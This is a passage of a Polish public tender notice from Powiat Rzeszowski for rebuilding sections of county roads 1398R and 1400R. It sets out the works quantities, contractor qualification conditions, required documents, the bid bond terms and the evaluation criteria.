8.12.	Nawierzchnie z kostki brukowej betonowej, grubość 6 cm, na podsypce cementowo-piaskowej 1:4 grubości 7 cm, kostka szara, obrukowanie wlotów/wylotów przepustów pod zjazdami (65szt. x 1,2 m2) - 	78	m2; 
8.13.	Przełożenie nawierzchni chodnika z kostki brukowej betonowej grubości 6cm na podsypce cementowo-piaskowej 1:4  średniej grubości 7cm, z wypełnieniem spoin piaskiem - 	400	m2; 
8.14.	Przełożenie krawężnika betonowego 15x30x100 cm na ławie betonowej i podsypce cementowo-piaskowej 1:4  średniej grubości 5cm - 	80	m; 
8.15.	Nawierzchnie na zjazdach z betonu asfaltowego grysowo-żwirowego dla kategorii ruchu KR1, warstwa asfaltowa grubości 6cm - 	3 250	m2.

2) Podstawę do wyceny stanowi Dokumentacja Projektowa i Specyfikacje Techniczne; 
3) Ceny jednostkowe powinny uwzględniać wszystkie wymagania Specyfikacji Istotnych Warunków Zamówienia, w szczególności Kosztorysu ofertowego, Dokumentacji Projektowej, Specyfikacji Technicznych Wykonania i Odbioru Robót Budowlanych oraz obejmować wszelkie koszty, jakie poniesie Wykonawca z tytułu należytej oraz zgodnej z obowiązującymi przepisami realizacji przedmiotu zamówienia; 
4) Wynagrodzenie Wykonawcy stanowić będzie wynik iloczynu ilości wykonanych robót i cen jednostkowych podanych w kosztorysie ofertowym; 5) Ceny jednostkowe określone przez Wykonawcę zostaną ustalone na okres ważności umowy i nie będą podlegały zmianom; ZATRUDNIENIE OSÓB NA PODSTAWIE UMOWY O PRACĘ: Zamawiający wymaga zatrudnienia przez Wykonawcę i Podwykonawcę na podstawie umowy 
o pracę osób wykonujących następujące czynności:
- rozbieranie elementów drogi,
- odspajanie, przemieszczanie, formowanie, zagęszczanie i profilowanie z plantowaniem mas ziemnych,
- oczyszczanie rowów ziemnych i części przelotowych przepustów,
- układanie podłoży z kruszyw i betonów pod przepusty, rów kryty, krawężniki, obrzeża i ścieki betonowe oraz studnie i studzienki,
- montowanie części przelotowych przepustów, rowu krytego, studni i studzienek oraz wylotów i ścianek czołowych,
- układanie podbudów z kruszyw i betonów,
- układanie krawężników i obrzeży oraz ścieków betonowych i prefabrykatów ażurowych,
- układanie nawierzchni z betonu asfaltowego i kostki brukowej,
- montowanie koszy i materacy kamiennych,
- układanie umocnień kamiennych z zabetonowaniem,
- betonowanie gurtów i oporników,
- montowanie oznakowania pionowego, barier energochłonnych i poręczy wygradzających,
- regulowanie studzienek dla urządzeń podziemnych,
jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony  w art. 22  § 1 ustawy z dnia 26 czerwca 1974 r.  Kodeks Pracy (t.j. Dz.U. z 2016 r. poz. 1666, ze zm.);
PODWYKONAWSTWO: 1. Zamawiający nie zastrzega obowiązku osobistego wykonania  przez Wykonawcę kluczowych części zamówienia. 
2. Zamawiający żąda wskazania przez Wykonawcę części zamówienia, których wykonanie zamierza powierzyć Podwykonawcom i podania przez Wykonawcę, firm Podwykonawców.
Wykonawca wskazuje w ofercie tylko te części zamówienia, które zamierza powierzyć Podwykonawcom -  dla których znane są firmy Podwykonawców. 
Wykonawca nie wskazuje podwykonawstwa, gdy na etapie składania oferty nie jest jeszcze znana firma Podwykonawcy.

3. W trakcie realizacji zamówienia Wykonawca może:
- wskazać innych niż w ofercie Podwykonawców;                       
- zrezygnować z podwykonawstwa;
- wskazać inny niż w ofercie zakres podwykonawstwa;
- wykonać zamówienie przy udziale Podwykonawców, chociaż w ofercie zadeklarował samodzielne wykonanie zamówienia.

Jeżeli zmiana albo rezygnacja z Podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się w celu wykazania spełniania warunków udziału w postępowaniu, Wykonawca zobowiązany jest wykazać Zamawiającemu, iż proponowany inny Podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż Podwykonawca, na którego zasoby Wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia.<br /><br /><b>II.5) Główny kod CPV: </b>45233220-7<br /><b> Dodatkowe kody CPV:</b>45233141-9,
                45233142-6,
                45233222-1<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 15/10/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1) dysponują  jedną osobą przewidzianą do kierowania robotami budowlanymi, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w zakresie dróg bez ograniczeń, która w okresie ostatnich 3 lat przed upływem terminu składania ofert pełniła funkcję Kierownika Budowy lub Kierownika Robót, na min. 2 robotach budowlanych, których przedmiotem była budowa, przebudowa lub rozbudowa drogi publicznej kategorii powiatowej, wojewódzkiej, krajowej  o wartości min. 2 mln PLN brutto każda robota budowlana.
Wartości w/w robót budowlanych w walutach obcych należy przeliczyć na PLN wg średniego kursu NBP na dzień ogłoszenia niniejszego zamówienia; 2) zrealizowali w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3 zamówienia, których przedmiotem była budowa, przebudowa lub rozbudowa drogi publicznej kategorii powiatowej, wojewódzkiej, krajowej  o wartości min. 2 mln PLN brutto każde zamówienie oraz przedstawią dowody określające, czy  roboty te zostały wykonane należycie, w szczególności będą zawierać informacje  o tym, czy roboty zostały wykonane  zgodnie z przepisami prawa budowlanego 
i prawidłowo ukończone. 
Wartości w/w zamówień w walutach obcych należy przeliczyć na PLN wg średniego kursu NBP na dzień ogłoszenia niniejszego zamówienia.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                POLEGANIE NA POTENCJALE INNYCH PODMIOTÓW:  
1. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, polegać na zdolnościach technicznych lub zawodowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych; 
2. Wykonawca, który polega na zdolnościach innych podmiotów, musi udowodnić Zamawiającemu, 
że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, 
w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia; 
3. Zamawiający oceni, czy udostępniane Wykonawcy przez inne podmioty zdolności techniczne lub zawodowe, pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu oraz zbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, o których mowa w art. 24 ust. 1 pkt 12-22 ustawy.
4. W odniesieniu do warunków dotyczących kwalifikacji zawodowych, doświadczenia, Wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują roboty budowlane lub usługi, do realizacji, których te zdolności są wymagane; 5. Jeżeli zdolności techniczne lub zawodowe podmiotu, na którego zdolnościach polega Wykonawca, nie potwierdzają spełnienia przez Wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tych podmiotów podstawy wykluczenia, Zamawiający zażąda, aby Wykonawca w terminie określonym przez Zamawiającego: 
1)  zastąpił ten podmiot innym podmiotem lub podmiotami lub 
2) zobowiązał się do osobistego wykonania odpowiedniej części zamówienia, jeżeli wykaże zdolności techniczne lub zawodowe, o których mowa w ust. 1; 	
6. W celu oceny, czy Wykonawca polegając na zdolnościach innych podmiotów na zasadach określonych w art. 22a ustawy, będzie dysponował niezbędnymi zasobami w stopniu umożliwiającym należyte wykonanie zamówienia publicznego oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, Zamawiający może żądać dokumentów, które określają w szczególności:
- zakres dostępnych Wykonawcy zasobów innego podmiotu;
- sposób wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia publicznego;
- zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego,
- czy podmiot, na zdolnościach, którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą; 
7. Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcie gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia.</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH NA WEZWANIE ZAMAWIAJĄCEGO.
1. Na wezwanie Zamawiającego, w celu potwierdzenia spełniania warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej Wykonawca zobowiązany jest do złożenia:
1) Oświadczenia zawierającego wskazanie imienia i nazwiska osoby skierowanej do kierowania  robotami budowlanymi wraz z wykazem zawierającym min. 2 roboty budowlane, na których pełnił funkcję Kierownika Budowy lub Kierownika Robót, których przedmiotem była budowa, przebudowa lub rozbudowa drogi publicznej kategorii powiatowej, wojewódzkiej, krajowej  o wartości min. 2 mln PLN brutto każda robota budowlana z okresu ostatnich 3 lat przed upływem terminu składnia ofert oraz informację o podstawie dysponowania tą osobą.
Wartości w/w robót budowlanych w walutach obcych należy przeliczyć na PLN wg średniego kursu NBP na dzień ogłoszenia niniejszego zamówienia; 	
2) Oświadczenia zawierającego wykaz min. 3 zamówień dotyczących wykonanych robót budowlanych polegających na budowie, przebudowie lub rozbudowie drogi o kategorii powiatowej, wojewódzkiej, krajowej o wartości min. 2 mln. PLN każde zamówienie z okresu ostatnich 5 lat przed upływem terminu składnia ofert, a jeżeli okres prowadzenia działalności jest krótszy - z tego okresu, z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym, czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone. 
Dowodami są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty.
Wartości w/w zamówień w walutach obcych należy przeliczyć na PLN wg średniego kursu NBP na dzień ogłoszenia niniejszego zamówienia; 
3) Wykonawca nie jest zobowiązany do złożenia w/w dokumentów, jeżeli Zamawiający posiada aktualne zaświadczenia lub dokumenty tego Wykonawcy potwierdzające spełnianie warunków udziału w postępowaniu lub może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych. W takim przypadku Wykonawca informuje Zamawiającego, do którego postępowania zostały złożone dokumenty lub oświadczenia, lub w jaki sposób są one dostępne dla Zamawiającego; 
2. W przypadku wątpliwości, co do treści dokumentu złożonego przez Wykonawcę, Zamawiający może zwrócić się do właściwych organów odpowiednio kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu; 3. Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie zamówienia publicznego, Zamawiający może na każdym etapie postępowania wezwać Wykonawców do złożenia wszystkich lub niektórych oświadczeń lub dokumentów potwierdzających, że nie podlegają wykluczeniu, spełniają warunki udziału w postępowaniu, a jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio oświadczenia lub dokumenty nie są już aktualne, do złożenia aktualnych oświadczeń lub dokumentów.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">WYKAZ OŚWIADCZEŃ WSTĘPNIE, POTWIERDZAJĄCYCH BRAK PODSTAW DO WYKLUCZENIA Z POSTĘPOWANIA ORAZ SPEŁNIANIE WARUNKÓW UDZIAŁU 
W POSTĘPOWANIU SKŁADANYCH WRAZ Z OFERTĄ: 1. Oświadczenie o braku podstaw do wykluczenia i spełniania warunków udziału w postępowaniu przez Wykonawcę aktualne na dzień składania ofert; 2. Oświadczenie o braku podstaw do wykluczenia i spełniania warunków udziału w postępowaniu przez inne podmioty, w zakresie, w jakim Wykonawca powołuje się na ich zasoby (jeśli dotyczy).
	
W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia; 	
3. Kosztorys ofertowy; 4. Zobowiązanie podmiotu trzeciego do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia  w przypadku, gdy Wykonawca powołuje się w celu wykazania spełniania warunków udziału w postępowaniu na zasoby podmiotów trzecich; 5.	Dokument, z którego będzie wynikać umocowanie do reprezentowania Wykonawcy - należy dołączyć odpowiedni dokument lub wskazać dostępność dokumentu pod określonym adresem internetowym ogólnodostępnych i bezpłatnych baz danych, skąd Zamawiający pobierze dokument samodzielnie. W przypadku reprezentowania Wykonawcy przez Pełnomocnika, dodatkowo należy dołączyć Pełnomocnictwo w oryginale lub kopii potwierdzonej za zgodność z oryginałem przez notariusza; 6. Pełnomocnictwo do reprezentowania w postępowaniu o  udzielenie zamówienia albo reprezentowania w postępowaniu i  zawarcia umowy w sprawie zamówienia publicznego w przypadku Wykonawców  wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy  oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza; 7.	Wykonawca, w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, dotyczącej:
- kwoty, jaką Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia;
- firm oraz adresów Wykonawców, którzy złożyli oferty w terminie;
- ceny, terminu wykonania zamówienia, okresu gwarancji i warunków płatności zawartych 
w ofertach, przekazuje Zamawiającemu w oryginale oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. 
o ochronie konkurencji  i konsumentów (Dz. U. z 2015 r. poz. 184, 1618 i 1634). Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.
W przypadku wspólnego ubiegania się o zamówienie publiczne oświadczenie składa każdy z Wykonawców.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1. Zamawiający wymaga od Wykonawców wniesienia wadium, w wysokości: 100 000,00 PLN, słownie: sto tysięcy 00/100 PLN; 2. Wadium wnosi się na rzecz: POWIAT RZESZOWSKI, 35-959 Rzeszów, ul. Grunwaldzka 15, przed upływem terminu składania ofert, tj. do dnia 19.04.2017 r. do godz. 10:00.
Potwierdzenie wniesienia wadium należy dołączyć do oferty; 3. Wadium musi obejmować cały okres związania ofertą i może być wnoszone w jednej lub kilku następujących formach: 1) pieniądzu  PRZELEW; 2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym  ORYGINAŁ; 3) gwarancjach bankowych  ORYGINAŁ; 4) gwarancjach ubezpieczeniowych  ORYGINAŁ; 5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U.  z 2014 r. poz. 1804 oraz z 2015 r. poz. 978 i 1240)  ORYGINAŁ; 4. Wadium wnoszone w pieniądzu Wykonawca wpłaca przelewem na rachunek bankowy Zamawiającego: POWIAT RZESZOWSKI, ul. Grunwaldzka 15, 35-959 Rzeszów,  w banku: 
Bank Polskiej Spółdzielczości S.A. Oddział w Rzeszowie, Nr 17 1930 1187 2710 0718 8675 0004 z dopiskiem: Przebudowa odcinków dróg powiatowych: Nr 1398R Rzeszów  Św. Roch  Chmielnik w km 8+312 do 9+424, Nr 1400R Kielnarowa  Chmielnik Zabratówka w km od 3+690 do 11+544; 5.	Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku Zamawiającego; 6. Wniesienie wadium w formie innej niż pieniądz poprzez dołączenie go do oferty jest równoznaczne z wniesieniem go przed upływem terminu składania ofert, pod warunkiem złożenia oferty przed upływem terminu składania ofert; 7. W przypadku składania przez Wykonawcę wadium w formie gwarancji, musi być ona sporządzona zgodnie z obowiązującym prawem; 
1) Gwarancja powinna obejmować n/w elementy:
a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielającej gwarancji) oraz wskazanie ich siedziby, b) określenie wierzytelności, która ma być zabezpieczona gwarancją, c) kwotę gwarancji, d) termin ważności gwarancji, e) zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, że Wykonawca, którego ofertę wybrano:
- odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
- nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
f) zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 i 3a ustawy, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń potwierdzających okoliczności, o których mowa w art. 25 ust.1, oświadczenia, o którym mowa w art. 25a ust. 1, pełnomocnictw, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę, jako najkorzystniejszej; 2) Gwarancja powinna być nieodwołalna i bezwarunkowa; 3) Wszelkie spory dotyczące gwarancji będą podlegać rozstrzygnięciu zgodnie z prawem polskim i podlegać kompetencji sądu właściwego dla siedziby Zamawiającego.</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>okres  gwarancji i rękojmi</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający dopuszcza możliwość dokonania istotnych zmian umowy w przypadku:
1) zaistnienia omyłki pisarskiej lub rachunkowej;
